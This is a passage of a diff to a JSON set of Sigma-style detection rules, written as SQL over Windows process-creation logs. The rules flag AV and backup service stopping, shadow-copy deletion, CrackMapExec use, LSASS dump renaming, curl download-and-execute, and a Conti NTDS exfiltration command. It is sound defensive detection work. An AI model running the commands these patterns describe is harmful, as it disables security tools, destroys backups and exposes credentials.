{ - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "status": "experimental", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' 
AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name 
IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% 
-u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { "title": "Suspicious Regsvr32 Execution With Image Extension", 
@@ -12474,1656 +12115,1627 @@ "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Conti NTDS 
Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine 
Bencherchali (Nextron Systems)", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' 
ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", - 
"status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Command lines that use the same flags" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f 